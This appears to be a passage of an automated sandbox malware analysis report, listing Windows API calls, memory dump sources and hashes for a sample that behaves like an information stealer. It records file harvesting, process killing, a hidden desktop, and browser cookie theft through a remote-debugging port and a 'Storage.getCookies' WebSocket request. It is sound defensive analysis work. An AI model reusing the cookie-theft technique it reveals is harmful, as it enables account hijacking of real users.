                                • StrCmpCA.SHLWAPI(?,00CFDF68), ref: 004E1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1685
                                • StrCmpCA.SHLWAPI(?,00CFDEA8), ref: 004E16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004E181C
                                • FindClose.KERNEL32(00000000), ref: 004E182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: c909d8fb85272f46adf941bf3d5e0e28dad020277ed5058682a89abfab25b0a2
                                • Instruction ID: 7e53ff847c0280b4ffb17749b52c3ffd45bae3800fc23ce5dddfd8187bed4c09
                                • Opcode Fuzzy Hash: c909d8fb85272f46adf941bf3d5e0e28dad020277ed5058682a89abfab25b0a2
                                • Instruction Fuzzy Hash: 19129270A102469BDB20EF76D999AAF77B8AF44305F04852EF84697361DF3CDC018B98
                                APIs
                                • wsprintfA.USER32 ref: 004ECBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 004ECC13
                                • lstrcat.KERNEL32(?,?), ref: 004ECC5F
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004ECC71
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004ECC8B
                                • wsprintfA.USER32 ref: 004ECCB0
                                • PathMatchSpecA.SHLWAPI(?,00CF9340), ref: 004ECCE2
                                • CoInitialize.OLE32(00000000), ref: 004ECCEE
                                  • Part of subcall function 004ECAE0: CoCreateInstance.COMBASE(004FB110,00000000,00000001,004FB100,?), ref: 004ECB06
                                  • Part of subcall function 004ECAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 004ECB46
                                  • Part of subcall function 004ECAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 004ECBC9
                                • CoUninitialize.COMBASE ref: 004ECD09
                                • lstrcat.KERNEL32(?,?), ref: 004ECD2E
                                • lstrlen.KERNEL32(?), ref: 004ECD3B
                                • StrCmpCA.SHLWAPI(?,004FCFEC), ref: 004ECD55
                                • wsprintfA.USER32 ref: 004ECD7D
                                • wsprintfA.USER32 ref: 004ECD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 004ECDB0
                                • wsprintfA.USER32 ref: 004ECDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004ECDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004ECE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004ECE28
                                • CloseHandle.KERNEL32(00000000), ref: 004ECE33
                                • CloseHandle.KERNEL32(00000000), ref: 004ECE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004ECE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 004ECE94
                                • FindNextFileA.KERNEL32(?,?), ref: 004ECF8D
                                • FindClose.KERNEL32(?), ref: 004ECF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: ba18dcad1fa1543d65e51847647703a6a2968bcc8437bef9f612b80ba18be6b2
                                • Instruction ID: 26712b1252ac0fb0a055e59248a85eff429cbd1053cdd2f01d49a7dadc9f0f98
                                • Opcode Fuzzy Hash: ba18dcad1fa1543d65e51847647703a6a2968bcc8437bef9f612b80ba18be6b2
                                • Instruction Fuzzy Hash: 03C19071A002599FCB60DF65DC84EEE7779FF44301F00859AF50997290DE38AA45CF99
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E12BF
                                • lstrlen.KERNEL32(00504CA8), ref: 004E12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12E7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E133A
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E135C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E1376
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E13E2
                                • lstrlen.KERNEL32(00501794), ref: 004E13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E140A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1416
                                • lstrlen.KERNEL32(?), ref: 004E1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1443
                                • lstrcat.KERNEL32(00000000,?), ref: 004E1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E147A
                                • StrCmpCA.SHLWAPI(?,00CFDF98), ref: 004E14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1535
                                • StrCmpCA.SHLWAPI(?,00CFE660), ref: 004E1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004E181C
                                • FindClose.KERNEL32(00000000), ref: 004E182B
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 9daa617f7b6bfa8db3bcffb05051ed0fc3c11d4558731a5209604ff2fe158bd1
                                • Instruction ID: b424fec51194e847c110c12e8574693380e8a4dcc9384d8d7c9603c43b588946
                                • Opcode Fuzzy Hash: 9daa617f7b6bfa8db3bcffb05051ed0fc3c11d4558731a5209604ff2fe158bd1
                                • Instruction Fuzzy Hash: 79C1D270A1025A9BDB21EF76DD99AAF77B8AF10305F04416AF84693361DF3CDC018B98
                                APIs
                                • memset.MSVCRT ref: 004D9790
                                • lstrcat.KERNEL32(?,?), ref: 004D97A0
                                • lstrcat.KERNEL32(?,?), ref: 004D97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004D97C3
                                • memset.MSVCRT ref: 004D97D7
                                  • Part of subcall function 004F3E70: lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F3EA5
                                  • Part of subcall function 004F3E70: lstrcpy.KERNEL32(00000000,00CFEB58), ref: 004F3ECF
                                  • Part of subcall function 004F3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,004D134E,?,0000001A), ref: 004F3ED9
                                • wsprintfA.USER32 ref: 004D9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 004D9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 004D9844
                                  • Part of subcall function 004F46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F46B9
                                  • Part of subcall function 004F46A0: Process32First.KERNEL32(00000000,00000128), ref: 004F46C9
                                  • Part of subcall function 004F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 004F46DB
                                  • Part of subcall function 004F46A0: StrCmpCA.SHLWAPI(?,?), ref: 004F46ED
                                  • Part of subcall function 004F46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F4702
                                  • Part of subcall function 004F46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F4711
                                  • Part of subcall function 004F46A0: CloseHandle.KERNEL32(00000000), ref: 004F4718
                                  • Part of subcall function 004F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 004F4726
                                  • Part of subcall function 004F46A0: CloseHandle.KERNEL32(00000000), ref: 004F4731
                                • lstrcat.KERNEL32(00000000,?), ref: 004D9878
                                • lstrcat.KERNEL32(00000000,?), ref: 004D9889
                                • lstrcat.KERNEL32(00000000,00504B60), ref: 004D989B
                                • memset.MSVCRT ref: 004D98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004D98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D9903
                                • StrStrA.SHLWAPI(00000000,00CFF798), ref: 004D9919
                                • lstrcpyn.KERNEL32(007093D0,00000000,00000000), ref: 004D9938
                                • lstrlen.KERNEL32(?), ref: 004D994B
                                • wsprintfA.USER32 ref: 004D995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 004D9971
                                • Sleep.KERNEL32(00001388), ref: 004D99E7
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D92E1
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D92FA
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D9399
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D93E6
                                  • Part of subcall function 004F4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 004F4759
                                  • Part of subcall function 004F4740: Process32First.KERNEL32(00000000,00000128), ref: 004F4769
                                  • Part of subcall function 004F4740: Process32Next.KERNEL32(00000000,00000128), ref: 004F477B
                                  • Part of subcall function 004F4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F479C
                                  • Part of subcall function 004F4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F47AB
                                  • Part of subcall function 004F4740: CloseHandle.KERNEL32(00000000), ref: 004F47B2
                                  • Part of subcall function 004F4740: Process32Next.KERNEL32(00000000,00000128), ref: 004F47C0
                                  • Part of subcall function 004F4740: CloseHandle.KERNEL32(00000000), ref: 004F47CB
                                • CloseDesktop.USER32(?), ref: 004D9A1C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 5676a0ee5b6d819dd8063d413fba929e557499a42c78a914ffda6a1d25012c96
                                • Instruction ID: 3dd8a58a2904a2896953a65b92041c36ebfef78d5477bc563972808d22de7ae7
                                • Opcode Fuzzy Hash: 5676a0ee5b6d819dd8063d413fba929e557499a42c78a914ffda6a1d25012c96
                                • Instruction Fuzzy Hash: F6918371A10219EBDB10DF74DC45FEE77B8EF44700F10819AF609A7291DE78AE448BA8
                                APIs
                                • wsprintfA.USER32 ref: 004EE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 004EE243
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004EE263
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004EE27D
                                • wsprintfA.USER32 ref: 004EE2A2
                                • StrCmpCA.SHLWAPI(?,004FCFEC), ref: 004EE2B4
                                • wsprintfA.USER32 ref: 004EE2D1
                                  • Part of subcall function 004EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 004EEE12
                                • wsprintfA.USER32 ref: 004EE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 004EE304
                                • lstrcat.KERNEL32(?,00CFFA58), ref: 004EE335
                                • lstrcat.KERNEL32(?,00501794), ref: 004EE347
                                • lstrcat.KERNEL32(?,?), ref: 004EE358
                                • lstrcat.KERNEL32(?,00501794), ref: 004EE36A
                                • lstrcat.KERNEL32(?,?), ref: 004EE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004EE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE422
                                • DeleteFileA.KERNEL32(?), ref: 004EE45C
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004EE49B
                                • FindClose.KERNEL32(00000000), ref: 004EE4AA
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: f9e587af5fa752c3d7b0d581cec3c24a226b9d64a9ed1c7ea1d401fc90c5c11e
                                • Instruction ID: 32907bddd1a4678b85bf8914f03f3ba7a7c2a774439c9f0184938b7d091c88e9
                                • Opcode Fuzzy Hash: f9e587af5fa752c3d7b0d581cec3c24a226b9d64a9ed1c7ea1d401fc90c5c11e
                                • Instruction Fuzzy Hash: 63818271900219DBCB20EF75DD45AEF7779BF44300F00869AF64A93291DE78AA44CF99
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D16E2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D176C
                                • lstrcat.KERNEL32(00000000), ref: 004D1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D18FE
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: df7627b83d9967828fb3d51a861ea988ef38c599195c16e638b50a56eff98cb9
                                • Instruction ID: cbe51061d89d9d021ee5623dc24c26b3ddd34e6421ffd2ded66de4b0c557338d
                                • Opcode Fuzzy Hash: df7627b83d9967828fb3d51a861ea988ef38c599195c16e638b50a56eff98cb9
                                • Instruction Fuzzy Hash: 4E817170A1021AEBCB21EF65DAA5AAF77B4EF10304F04516BFD0597362CB789C01CB99
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004EDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004EDD4C
                                • wsprintfA.USER32 ref: 004EDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 004EDD79
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004EDD9C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004EDDB6
                                • wsprintfA.USER32 ref: 004EDDD4
                                • DeleteFileA.KERNEL32(?), ref: 004EDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004EDDED
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                  • Part of subcall function 004ED980: memset.MSVCRT ref: 004ED9A1
                                  • Part of subcall function 004ED980: memset.MSVCRT ref: 004ED9B3
                                  • Part of subcall function 004ED980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004ED9DB
                                  • Part of subcall function 004ED980: lstrcpy.KERNEL32(00000000,?), ref: 004EDA0E
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,00000000), ref: 004EDA1C
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,00CFF840), ref: 004EDA36
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,?), ref: 004EDA4A
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,00CFE028), ref: 004EDA5E
                                  • Part of subcall function 004ED980: lstrcpy.KERNEL32(00000000,?), ref: 004EDA8E
                                  • Part of subcall function 004ED980: GetFileAttributesA.KERNEL32(00000000), ref: 004EDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004EDE2E
                                • FindClose.KERNEL32(00000000), ref: 004EDE3D
                                • lstrcat.KERNEL32(?,00CFFA58), ref: 004EDE66
                                • lstrcat.KERNEL32(?,00CFE740), ref: 004EDE7A
                                • lstrlen.KERNEL32(?), ref: 004EDE84
                                • lstrlen.KERNEL32(?), ref: 004EDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EDED2
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 99a526190f00295132f1c5275e0d16d514fb0972f22499cc895b3bb39d7b3460
                                • Instruction ID: 1975c40ef97b8aaedd92b6cd280c09c34682e84536a227251f3e64f3685111df
                                • Opcode Fuzzy Hash: 99a526190f00295132f1c5275e0d16d514fb0972f22499cc895b3bb39d7b3460
                                • Instruction Fuzzy Hash: 88618071A00209EBCB10EB75DD49AEE7779FF58300F0086AAF64597351DF38AA44CB54
                                APIs
                                • wsprintfA.USER32 ref: 004ED54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 004ED564
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004ED584
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004ED59E
                                • lstrcat.KERNEL32(?,00CFFA58), ref: 004ED5E3
                                • lstrcat.KERNEL32(?,00CFF8C8), ref: 004ED5F7
                                • lstrcat.KERNEL32(?,?), ref: 004ED60B
                                • lstrcat.KERNEL32(?,?), ref: 004ED61C
                                • lstrcat.KERNEL32(?,00501794), ref: 004ED62E
                                • lstrcat.KERNEL32(?,?), ref: 004ED642
                                • lstrcpy.KERNEL32(00000000,?), ref: 004ED682
                                • lstrcpy.KERNEL32(00000000,?), ref: 004ED6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004ED737
                                • FindClose.KERNEL32(00000000), ref: 004ED746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 3a3f4c6b08786a0a37abad3b36e41f9f0261b4d21b4c9ea0c387783542d673ae
                                • Instruction ID: 5b48c78057b83d39d3dcfd5a72092c044b0c529a91ac6376263b2fbb063a727d
                                • Opcode Fuzzy Hash: 3a3f4c6b08786a0a37abad3b36e41f9f0261b4d21b4c9ea0c387783542d673ae
                                • Instruction Fuzzy Hash: F1617371A101199BCF20EF75DD88ADE77B8EF48305F0085AAE64993351DF38AA44CF94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: 754e2087b1bb663583c3c07747c4319a175962619617ebfba0c8229ebdf95a8f
                                • Instruction ID: bbc6e7a58c077fb79adcde1f44751ce742008cc385f0c62ba2f4c74f7e48652d
                                • Opcode Fuzzy Hash: 754e2087b1bb663583c3c07747c4319a175962619617ebfba0c8229ebdf95a8f
                                • Instruction Fuzzy Hash: 94A26870D0125D9FDB10DFA8C9907EEBBB6AF88304F1481AAD608A7341DB785E85CF95
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E2402
                                • lstrlen.KERNEL32(\*.*), ref: 004E240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004E2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
